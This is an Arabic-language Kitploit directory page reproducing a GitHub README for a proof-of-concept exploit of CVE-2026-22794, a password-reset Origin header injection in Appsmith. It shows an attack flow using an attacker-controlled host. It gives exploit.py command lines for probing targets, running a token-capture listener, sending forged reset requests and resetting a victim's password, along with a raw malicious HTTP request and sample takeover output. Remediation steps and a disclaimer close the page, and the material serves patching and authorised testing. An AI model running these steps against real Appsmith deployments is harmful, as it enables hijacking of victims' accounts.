Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/malikhamza7/cve-2026-22794-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقة
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - استيلاء على حساب إعادة تعيين كلمة المرور في Appsmith عبر حقن ترويسة Origin | استغلال PoC + قالب Nuclei

عرض المستودع
78منذ 7 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22794 - حقن ترويسة Origin في Appsmith

Python Version CVE License

🔴 ثغرة أمنية حرجة

اختطاف رابط إعادة تعيين كلمة المرور عبر التلاعب بترويسة Origin

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال CVE-2026-22794، وهي ثغرة حرجة في Appsmith تسمح للمهاجمين باختطاف رموز إعادة تعيين كلمة المرور وتحقيق السيطرة الكاملة على الحساب.

📋 ملخص الثغرة

الحقلالقيمة
معرف CVECVE-2026-22794
البرنامج المتأثرAppsmith (الإصدارات السابقة للتصحيح)
نوع الثغرةحقن ترويسة Origin
الأثرسيطرة كاملة على الحساب
درجة CVSS9.1 (حرجة)
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدممطلوب (الضحية تنقر على الرابط)

🎯 وصف الثغرة

يستخدم Appsmith ترويسة HTTP Origin دون تحقق لبناء روابط إعادة تعيين كلمة المرور والتحقق من البريد الإلكتروني. يقوم الكود المعرض للخطر بتعيين ترويسة Origin مباشرة إلى عنوان URL الأساسي لإعادة تعيين كلمة المرور:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

وهذا يسمح للمهاجم بـ:

  1. تشغيل إعادة تعيين كلمة المرور لأي عنوان بريد إلكتروني
  2. حقن ترويسة Origin خبيثة تشير إلى خادم يتحكم فيه المهاجم
  3. التقاط رمز إعادة تعيين كلمة المرور عندما تنقر الضحية على الرابط
  4. استخدام الرمز لإعادة تعيين كلمة مرور الضحية والسيطرة على حسابها

🔥 سلسلة الهجوم

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     تدفق الهجوم                                  │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ المهاجم  │                    │ APPSMITH │                    │  الضحية  │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. إرسال بريد إلكتروني مع    │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. الضحية تنقر على الرابط     │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. تم التقاط الرمز!           │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. سيطرة كاملة على الحساب! ✓  │                               │
       │                               │                               │

📦 التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# تثبيت التبعيات
pip install -r requirements.txt

🚀 الاستخدام

التحقق مما إذا كان الهدف معرضًا للخطر

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

بدء خادم التقاط الرمز

root@kitploit:~
python exploit.py --listen --port 8080

إرسال طلب إعادة تعيين كلمة المرور الخبيث

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

هجوم آلي كامل

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

استخدام الرمز الملتقط لإعادة تعيين كلمة المرور

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 عرض الهجوم

الخطوة 1: المهاجم يرسل طلبًا خبيثًا

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

الخطوة 2: الضحية تتلقى بريدًا إلكترونيًا برابط خبيث

root@kitploit:~
Password Reset Link: https://attacker-server.com/user/resetPassword?token=abc123xyz...

الخطوة 3: المهاجم يلتقط الرمز

root@kitploit:~
[+] INCOMING REQUEST CAPTURED!
[*] Path: /user/resetPassword?token=abc123xyz789...
[!!!] PASSWORD RESET TOKEN CAPTURED!
[!!!] Token: abc123xyz789...

الخطوة 4: السيطرة على الحساب

root@kitploit:~
[+] ACCOUNT TAKEOVER SUCCESSFUL!
[+] Password has been reset to: NewP@ssw0rd!

🛡️ المعالجة

يجب على المؤسسات التي تستخدم Appsmith:

  1. التحديث فورًا إلى أحدث إصدار مصحح
  2. التحقق من ترويسات Origin مقابل قائمة بيضاء بالنطاقات المسموح بها
  3. استخدام إعدادات من جانب الخادم لتوليد روابط إعادة تعيين كلمة المرور
  4. تنفيذ تحقق إضافي (مثل التحقق من IP، وانتهاء صلاحية قصير للرمز)

مثال على الكود الآمن

root@kitploit:~
// ❌ كود معرض للخطر
userPasswordDTO.setBaseUrl(originHeader);

// ✅ كود آمن
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// أو التحقق من القائمة البيضاء
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 هيكل المستودع

root@kitploit:~
CVE-2026-22794/
├── README.md           # هذا الملف
├── exploit.py          # سكربت الاستغلال الرئيسي
├── requirements.txt    # تبعيات Python
├── LICENSE             # رخصة MIT
└── docs/
    └── technical_analysis.md  # تحليل فني مفصل للثغرة

⚠️ إخلاء مسؤولية قانوني

هذه الأداة مقدمة لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط.

  • استخدم هذه الأداة فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة
  • اتبع دائمًا ممارسات الإفصاح المسؤول

📄 المراجع

  • CVE-2026-22794
  • OWASP - Forgot Password Cheat Sheet
  • CWE-346: Origin Validation Error

👤 المؤلف

باحث أمني

  • GitHub: @MalikHamza7
  • LinkedIn: ملفك الشخصي على LinkedIn

📜 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.


⭐ إذا وجدت هذا مفيدًا، يرجى وضع نجمة على المستودع! ⭐

تنزيل الأداة